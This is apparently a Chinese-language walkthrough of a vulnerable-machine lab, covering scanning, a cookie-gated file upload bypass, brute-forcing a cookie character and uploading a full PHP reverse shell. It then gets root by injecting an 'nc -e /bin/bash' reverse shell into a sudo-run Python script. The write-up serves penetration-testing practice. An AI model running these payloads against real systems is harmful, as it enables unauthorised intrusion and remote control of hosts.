攻击机
192.168.223.128目标机
192.168.223.147主机发现
nmap -sP 192.168.223.0/24
端口扫描
nmap -sV -A -p- 192.168.223.147
开启了22 80 端口
看一下web界面
源码,robots.txt ,url都观察了一下好像没什么有用信息
扫一下目录
gobuster dir -u http://192.168.223.147 -x html,txt,php,bak --wordlist=/usr/share/wordlists/dirb/common.txt 
挨个查看,发现dashboard.html可以文件上传
而且main.js里面有后端代码
传一个一句话木马试试,发现.php被过滤,传txt文件上传成功,但是上传到哪儿了,不知道,根据前端信息about Owls,在owls下看到了上传的txt文件
但不是php文件这么执行呢,想起来还有个ajax.php,打开是空白的,看一下有没有备份文件
发现存在bak文件
//The boss told me to add one more Upper Case letter at the end of the cookieif(isset($_COOKIE['admin']) && $_COOKIE['admin'] == '&G6u@B6uDXMq&Ms'){//[+] Add if $_POST['secure'] == 'val1d'$valid_ext = array("pdf","php","txt");}else{$valid_ext = array("txt");}// Remember success upload returns 1 当上传时候cookie为admin=&G6u@B6uDXMq&Ms,并且cookie后面还有一个多的大写字母,post secure=val1d时候才能上传php文件
重新上传一次,记得用爆破最后一位cookie,发现是R
发现上传成功
一句话发现不好用,直接用一个反弹shell 的脚本
<?php
set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.223.128';
$port = 4567;
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
if (function_exists('pcntl_fork')) {$pid = pcntl_fork();if ($pid == -1) {printit("ERROR: Can't fork");exit(1);}if ($pid) {exit(0); // Parent exits}if (posix_setsid() == -1) {printit("Error: Can't setsid()");exit(1);}$daemon = 1;
} else {printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}
chdir("/");
umask(0);
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {printit("$errstr ($errno)");exit(1);
}
$descriptorspec = array(0 => array("pipe", "r"), // stdin is a pipe that the child will read from1 => array("pipe", "w"), // stdout is a pipe that the child will write to2 => array("pipe", "w") // stderr is a pipe that the child will write to
);
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {printit("ERROR: Can't spawn shell");exit(1);
}
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port");
while (1) {if (feof($sock)) {printit("ERROR: Shell connection terminated");break;}if (feof($pipes[1])) {printit("ERROR: Shell process terminated");break;}$read_a = array($sock, $pipes[1], $pipes[2]);$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);if (in_array($sock, $read_a)) {if ($debug) printit("SOCK READ");$input = fread($sock, $chunk_size);if ($debug) printit("SOCK: $input");fwrite($pipes[0], $input);}if (in_array($pipes[1], $read_a)) {if ($debug) printit("STDOUT READ");$input = fread($pipes[1], $chunk_size);if ($debug) printit("STDOUT: $input");fwrite($sock, $input);}if (in_array($pipes[2], $read_a)) {if ($debug) printit("STDERR READ");$input = fread($pipes[2], $chunk_size);if ($debug) printit("STDERR: $input");fwrite($sock, $input);}
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
function printit ($string) {if (!$daemon) {print "$string\n";}
}
?> 重新上传
攻击机开个监听端口
nc -lvnp 4567拿到shell
切换到交互式shell
python3 -c 'import pty; pty.spawn("/bin/bash")'
athena用户有两个txt文件,一个是提示密码的,另一个是个flag
看看能不能连接上athena的22端口,密码是myvulnerableapp*,(md,考英文呢,Asterisk是星号的意思),成功连上
发现有一个提权文件
看一下这个py文件
会产生一个随机cookie,种子由用户输入,然后执行cmd这个命令,这个命令是root权限,可以将反弹shell 的命令写入cmd来提权
sudo -u root python3 /home/team-tasks/cookie-gen.py #root执行py文件
nc -lvnp 4444 #攻击机开启监听端口
;nc -e /bin/bash 192.168.223.128 4444; #执行反弹shell命令成功拿到root权限,注意用python3执行,python默认用python2
总结:1.目录扫描2.备份文件3.文件上传4.直接命令执行提权
